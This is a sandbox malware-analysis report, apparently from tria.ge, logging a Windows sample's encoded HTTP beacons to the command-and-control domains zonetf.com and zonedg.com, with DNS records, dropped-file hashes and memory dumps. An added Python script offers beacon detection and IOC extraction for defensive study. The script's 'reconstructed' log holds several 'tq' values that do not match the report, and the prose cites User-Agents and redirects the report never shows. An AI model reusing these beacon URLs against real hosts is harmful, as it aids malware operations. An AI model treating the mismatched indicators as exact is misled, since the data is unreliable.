        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 679 B (7 packets)
        received: 567 B (5 packets)

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D

        HTTP Response

        302
      • 206.238.216.8:80
        http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 541 B (8 packets)
        received: 455 B (6 packets)

        HTTP Request

        GET http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg

        HTTP Response

        301
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 653 B (7 packets)
        received: 970 B (6 packets)

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

        HTTP Response

        302
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 671 B (7 packets)
        received: 970 B (6 packets)

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D

        HTTP Response

        302
      • 8.8.8.8:53
        blenderartists.org
        protocol: dns
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 64 B (1 packet)
        received: 96 B (1 packet)

        DNS Request

        blenderartists.org

        DNS Response

        104.21.49.24
        172.67.188.202

      • 8.8.8.8:53
        zonetf.com
        protocol: dns
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 56 B (1 packet)
        received: 72 B (1 packet)

        DNS Request

        zonetf.com

        DNS Response

        212.32.237.92

      • 8.8.8.8:53
        zonedg.com
        protocol: dns
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 112 B (2 packets)
        received: 72 B (1 packet)

        DNS Request

        zonedg.com

        DNS Request

        zonedg.com

        DNS Response

        206.238.216.8
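
The HTTP exchanges above share a pattern worth turning into detection logic. Every request carries a `tq=` query parameter whose value is URL-encoded base64 (the %2B, %2F and trailing %3D%3D are `+`, `/` and `==`), the GETs use the non-browser User-Agent `iamx/3.11` over HTTP/1.0, the POSTs claim IE 6 on Windows NT 5.1 (Windows XP) although the host is Windows 7 and send `Content-Length: 0`, so the data is entirely in the URL, and the server answers each POST with a 302 to survey-smiles.com plus a fresh `sid` cookie that the client never sends back. blenderartists.org is a public community site that just answers with a 301 to HTTPS, so the request pattern, not that domain, is the useful indicator. The script below is an added example, not tria.ge's code; it runs those checks over a tab-separated log reconstructed from the report (layout: method, URL, User-Agent, request Content-Length, status, Location, an assumption of this example), decodes the `tq` blob, and collects IOCs from the flagged requests. The blenderartists.org `tq` value and Location are truncated in the sample, and the last line is a constructed benign request used as a control.

```python
"""Beacon detection over the HTTP exchanges in the Network section above.
Added example; not tria.ge's code. The tab-separated layout (method, URL,
User-Agent, request Content-Length, status, Location) is an assumption of this
example, not a format the report or any sensor emits."""
import base64
import re
from urllib.parse import urlsplit, unquote

# Reconstructed from the report. The blenderartists.org 'tq' blob and its Location
# are truncated here; the zonetf.com and zonedg.com lines are complete. The last
# line is a constructed benign request used as a control.
SAMPLE_LOG = """\
GET\thttp://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08\tiamx/3.11\t-\t301\thttps://blenderartists.org/external/Banners/facebook.jpg
POST\thttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAMRu4pVKv975Xlm5G\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\t0\t302\thttp://survey-smiles.com
GET\thttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg\tiamx/3.11\t-\t301\thttp://www.zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg
POST\thttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\t0\t302\thttp://survey-smiles.com
GET\thttp://example.com/index.html\tMozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36\t-\t200\t-
"""

BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
NON_BROWSER_UA = re.compile(r"^iamx/")                   # UA on the GET beacons
LEGACY_UA = re.compile(r"MSIE 6\.0; Windows NT 5\.1")   # IE 6 on XP, from a Win7 host
DECOY = "http://survey-smiles.com"


def parse_log(text):
    """Parse the tab-separated sample into dicts; '-' means the header was absent."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        method, url, ua, clen, status, location = line.split("\t")
        records.append({"method": method, "url": url, "ua": ua,
                        "content_length": None if clen == "-" else int(clen),
                        "status": int(status), "location": location})
    return records


def decode_tq(url):
    """Return the base64-decoded 'tq' value, or None when absent or not base64.
    unquote() (not unquote_plus) is used so a literal '+' stays a '+'."""
    for part in urlsplit(url).query.split("&"):
        key, _, value = part.partition("=")
        if key != "tq":
            continue
        blob = unquote(value)
        if not BASE64_RE.match(blob):
            return None
        blob += "=" * (-len(blob) % 4)        # tolerate stripped padding
        try:
            return base64.b64decode(blob, validate=True)
        except ValueError:                     # binascii.Error is a ValueError
            return None
    return None


def beacon_indicators(rec):
    """List the traits of one request that match the pattern in the report."""
    parts = urlsplit(rec["url"])
    hits = []
    blob = decode_tq(rec["url"])
    if blob is not None:
        hits.append(f"opaque base64 'tq' parameter ({len(blob)} bytes) on {parts.path}")
    if NON_BROWSER_UA.search(rec["ua"]):
        hits.append(f"non-browser User-Agent {rec['ua']!r}")
    if LEGACY_UA.search(rec["ua"]):
        hits.append("User-Agent claims IE 6 on Windows XP; the sandbox host is Windows 7")
    if rec["method"] == "POST" and rec["content_length"] == 0:
        hits.append("empty POST body: the payload travels in the query string")
    if 300 <= rec["status"] < 400 and rec["location"].startswith(DECOY):
        hits.append("redirected to the survey-smiles.com decoy")
    return hits


def extract_iocs(records):
    """Collect hosts, paths and User-Agents from every request that was flagged."""
    iocs = {"hosts": set(), "paths": set(), "user_agents": set()}
    for rec in records:
        if beacon_indicators(rec):
            parts = urlsplit(rec["url"])
            iocs["hosts"].add(parts.hostname)
            iocs["paths"].add(parts.path)
            iocs["user_agents"].add(rec["ua"])
    return iocs


RECORDS = parse_log(SAMPLE_LOG)

if __name__ == "__main__":
    for rec in RECORDS:
        print(rec["method"], rec["url"][:60])
        for hit in beacon_indicators(rec):
            print("   -", hit)
    print(extract_iocs(RECORDS))
```

The decoded `tq` bytes are opaque; the example only measures them, it does not claim to know the encoding underneath the base64 layer. In a proxy or IDS rule the strong combination is an image or HTML path with a long base64 query parameter plus one of the two User-Agents; either alone will also match legitimate traffic.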

      MITRE ATT&CK Enterprise v15


      Downloads

      • C:\Users\Admin\AppData\Roaming\3AA1.2DF

        Filesize

        300B

        MD5

        43d6ba7e91b5a95024e94a5d92ae3253

        SHA1

        46ba464d2694e865277b9b2d8d58b6a52e742ef9

        SHA256

        9e3a524c5cbda746de47b1bbf23d0a0dc17333a4417c4a8ff0f77efeb9cb8f32

        SHA512

        08f584c7130368905e97b5af2a3468e2b2eac6156f9fe47608d7748fb06505e82b3824b762a6bcebacafcf9f014c6f390d5b84a0d1f2d8b4424f41df53dacfb4

      • C:\Users\Admin\AppData\Roaming\3AA1.2DF

        Filesize

        1KB

        MD5

        360d074420a5f4ae3283e5cb833b8364

        SHA1

        57c5026ba03daef89440144b0a21a0fc044a53c9

        SHA256

        a952fbfb41148579acd22d27a079b159b7c2a022fd7ecf7186a6d53a78d1749f

        SHA512

        2271d17fe2d8b058e086fa9da65b6c776258ece8156678c234e0148aa9529c856cfb93d4dc648df100f7f45a7b1ba522a7fe56a140ee65acb04cb4f16eaea809

      • C:\Users\Admin\AppData\Roaming\3AA1.2DF

        Filesize

        696B

        MD5

        4124215bcd51189a2d667f1f3df4f5da

        SHA1

        9ce7c2dafa3b6a499f4625d7492d5e0e593d6c23

        SHA256

        6ab05e26fa32776e2c17959d3bfc6dfc3893a47e9e610ad501803e0624f7d82d

        SHA512

        730972d3346792d82d7022e391db07fa4b3e3803f5c235a920e3558e6a1d4aa0a6ced3a06b6d8f69a4dfd5dfae6bce8647e289ec948b9f0d64203d726e821875

      • memory/804-6-0x0000000000575000-0x0000000000598000-memory.dmp

        Filesize

        140KB

      • memory/804-5-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2188-71-0x0000000000635000-0x0000000000658000-memory.dmp

        Filesize

        140KB

      • memory/2188-70-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2320-1-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2320-73-0x0000000000660000-0x0000000000760000-memory.dmp

        Filesize

        1024KB

      • memory/2320-72-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2320-64-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2320-2-0x0000000000660000-0x0000000000760000-memory.dmp

        Filesize

        1024KB

      • memory/2320-162-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB
